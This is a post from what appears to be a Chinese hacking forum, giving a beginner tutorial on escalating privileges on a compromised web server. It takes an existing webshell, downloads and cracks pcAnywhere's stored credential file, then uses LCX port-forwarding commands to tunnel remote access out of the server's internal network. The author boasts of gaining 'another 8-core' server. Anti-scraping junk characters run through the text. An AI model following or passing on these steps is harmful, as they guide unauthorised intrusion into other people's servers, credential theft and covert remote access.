- 帖子
- 199
- 积分
- 724
- 威望
- 508
- 金钱
- 10463
- 在线时间
- 185 小时
|
很多教程都是在外网直接连接的,像我这样的小菜没有这么好的命,我在用pcanywhere提权时问题总是多多,所以我今天做个在内网连接pcanywhere的简单教程。
$ K9 q2 y4 S8 `% S5 j3 q9 L+ g9 h8 N* C, C6 E4 d$ A
提权方法:pcanywhere+LCX' D" K. w8 |7 _: D) R
* a- J% S o4 s: s8 j4 @7 b z
获得webshell的过程就不说了,该篇教程主要给新手讲下提权的思路。
; _9 d+ o) a8 B- y
2 Z* x- V, ~2 X, O在shell里看了下,WScript.shell等重要的组件没有被禁用,首先在有可执行读写权限的目录,上传个cmd试下可以运行。
* \# E" \% B2 o
9 [5 ^& W. I/ l4 }
) X" z I, A: L. `) \查看服务器开的端口时,发现服务器开了80、1433、5631等端口,并且服务器在内网。
/ g; C/ N+ p: L' P4 y% \6 g$ _% C O$ B2 c
0 C2 P$ Z) B& x+ X呵呵```pcanywhere的端口为5631,既然该站点有pcanywhere,我们可以试下用pcanywheere提权。于是就查下pcanywhere的目录下账号密码文件,下载到本地计算机上破解,呵呵```账号密码出来了。- P; z7 w/ ~" {$ W) P% n# l
0 A& n* }' J8 P! T; C
2 g+ O7 z, b0 c
7 z1 E; M; Y p$ q
# |1 {$ {( ` p. p$ g% C6 G由于服务器在内网,那我们就要做端口转发,又要用到LCX啦`` F n6 h$ R5 I9 Z; D
$ i3 x* h$ l+ f
6 F0 w, ?7 u) q; y5 E6 \& lLCX的用法再简单说下:
2 M5 O8 {' E3 |- R7 k! E4 x3 |9 z7 x+ D" J+ k
服务器上运行:lcx -slave XXX.XXX.XXX.XXX(你自己公网ip) XX(端口号) XXX.XXX.XXX.XXX(服务器ip) XXXX(服务器需要转发出去的端口)) _) e, s& @, N
- A2 U& |9 `( j" r$ X4 C; ~本地计算机上运行:lcx -listen XX(端口号) XXX(在自己机器上指定的端口)
1 l3 o1 O# Y( |% H5 Z, Z& N( h. d" s/ ?+ w. l( x9 |
由于我的机器也在内网,LCX 转发端口到本地必须用公网ip,所以我还需要在路由器上简单设置下。3 I' c* y g. b1 V2 a! }
顺便说下如果大家的机器在外网就不必再做端口映射之类的啦``
, H$ O/ y6 i; `4 h; }% {9 ?
/ m8 d% L7 u) z; x0 s; T9 M) j3 c7 J, M9 H2 F( \$ H" `
0 f3 T& z2 r- K, n7 H
1 c! n' \+ v: @. m; u呵呵``在连接的过程中出现个小问题,由于我用的是pcanyshell10.5的版本,在连接的时候提示版本过低,那我们就用12.0的版本试下。( t6 a, O- ?4 Z# R2 \; G
1 t9 q; b: A I
9 f( @2 m1 i. X
8 K) u6 J' k% M6 E
# w9 d! O8 ~, P我们本地连接试试,输入我们刚破解的账号密码# y. P9 g: Y2 Q+ B) r! l
9 _3 t8 n8 w) o7 @7 X
: U9 }5 R* G9 B2 X. `2 z呵呵``连接成功,服务器不错,又一个8核^︵^
9 W9 X3 H5 J$ _! P: v4 h# J) r, z: X( Q- c" O0 J, r
; y+ ~; P% h* {: G: [
5 u$ k# y' d0 c0 R0 |- D |
附件: 您需要登录才可以下载或查看附件。没有帐号?注册
-
1
评分人数
-
|